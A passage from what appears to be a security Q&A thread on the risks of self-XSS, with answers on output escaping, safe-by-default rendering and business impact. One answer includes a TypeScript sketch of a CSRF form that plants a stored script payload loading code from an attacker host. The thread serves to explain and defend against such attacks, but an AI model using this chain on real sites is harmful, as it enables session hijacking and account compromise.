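const note = "One can make bold text by surrounding it with these tags: <b>Hello, bold world!</b>";

// A field that "removes all text after a less-than sign" destroys the note:
const stripped = note.split("<")[0];
// -> "One can make bold text by surrounding it with these tags: "

// Escaping on output keeps the note intact, displaying the tags literally
// while still preventing them from being interpreted as HTML:
const escaped = note
  .replace(/&/g, "&amp;")
  .replace(/</g, "&lt;")
  .replace(/>/g, "&gt;");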






answered Apr 2 at 14:04 by dotancohen, edited Apr 3 at 15:34
Something not mentioned in other answers is the potential secondary security issues that can arise from a self-XSS.

Suppose your app has some really powerful/dangerous functionality that requires the user to enter their password again, such as changing an old password or allowing a third party to access their account. An attacker might gain access to the account temporarily via an attack like cookie-jacking, an idle session (user away from their desk), or a cross-site request forgery (CSRF). In any of these cases the attacker wouldn't be able to directly perform these powerful actions, because they wouldn't know the user's password. However, they could take advantage of the self-XSS vulnerability to perform a very convincing social-engineering attack to get the user's credentials, or set up an XSS payload that gives them persistent access to the user's account (every time the user logs in).

In the case of CSRF, a relatively harmless action might be transformed into a powerful attack by using the CSRF to cause a stored self-XSS that then gives the attacker access to the user's cookies or browser session. I've actually used this attack-chain technique several times when demonstrating vulnerabilities to developers.
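
As a sketch of that chain's first step (illustrative TypeScript on an attacker's page; the URLs are hypothetical, and modern SameSite cookie defaults may block it), a hidden cross-site form post can plant the stored payload:

const form = document.createElement("form");
form.method = "POST";
// The vulnerable site's endpoint that stores the "note" without a CSRF token:
form.action = "https://www.example.com/submit";

const note = document.createElement("input");
note.type = "hidden";
note.name = "note";
// The stored self-XSS payload that will later run in the victim's session:
note.value = '<script src="https://attacker.example/payload.js"></script>';
form.appendChild(note);

document.body.appendChild(form);
form.submit(); // the browser attaches the victim's session cookie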






answered Apr 3 at 17:20 by shellster, edited Apr 4 at 13:47
There are some great answers here from a pure security perspective. The self-XSS angle is absolutely correct, even if the top answer related to it didn't explicitly make the connection it implies.

That connection being, essentially: if people can be tricked into dropping self-XSS code into the dev console, why would you expect them not to get tricked into dropping it into some input element in your UI?

Some other answers tie that together with how this can create broader issues when it (in my opinion inevitably, if someone gets tricked into self-XSSing) leads to account compromises.

I think those are probably the top, immediate reasons. But I'd still like to address this from another angle:

Development Practices: Implications of Allowing Self-XSS

Let's say a user can store some data in a web app. I'm now only
talking about that sort of data the user can THEMSELVES view, not that
is intended to be viewed by other users of the webapp.

The problem with your supposition here is that it assumes you don't prevent XSS on all output of user-provided data as a default practice: ideally as the default output mechanism of the class or function used to retrieve and output data, with any deviation requiring a specific parameter to select a different output-filtering method.

Suppose your application is not coded in such a way that the default method of output prevents XSS (and different output targets, such as attributes versus elements, require different methodologies for what is and isn't allowed, hence "default"), and it does not take more effort, rather than less, to let something through as native HTML (hopefully whitelisted and purified).

How sure are you, then, that you won't have an accident where some reflection of user data back to the web allows XSS beyond just "data the user can THEMSELVES view"?

Because mistakes happen. People forget steps when writing code. Failures occur in training, where key points or even whole topics get missed. Some people do not "RTFM": even developers. Your application architecture/framework should be all about making sure that the path of least resistance when writing code is always the safest outcome, not the least safe one.

Allowing XSS to potentially occur based on user input should require a positive action, an explicit choice by the developer at each place it might occur, not simply be the basic, default outcome of pulling stored user data and reflecting it back out. If your code is not written like this, where it prevents XSS by default and requires an override parameter of some kind to disable the output purifying, then it's a sign that you need to re-evaluate your process.
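
A minimal sketch of that "safe by default, explicit opt-out" pattern (illustrative TypeScript; the names come from no particular framework):

type OutputMode = "escaped" | "raw";

function renderUserData(value: string, mode: OutputMode = "escaped"): string {
  if (mode === "raw") {
    // The dangerous path is a deliberate, greppable choice at the call
    // site, and should only follow whitelist-based purification.
    return value;
  }
  // The default path escapes, so forgetting the parameter stays safe.
  return value
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

const purified = "<b>already whitelisted markup</b>"; // assume purified upstream
renderUserData('<script>alert(1)</script>'); // escaped by default
renderUserData(purified, "raw");             // explicit, reviewable exception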






answered Apr 4 at 19:50 by taswyn
Although in this context we focus on the technical consequences of allowing a self-XSS, we should also take into consideration the impact of such a thing on the business: a self-XSS could cause unexpected behaviours (affecting user experience), so how should a user feel or react when running into it?

Furthermore, considering that an XSS vulnerability is easily avoidable, is it really worth not worrying about it? Just think about any possible consequence: opened support tickets, reported bugs, user discontent...






answered Apr 4 at 8:48 by n0idea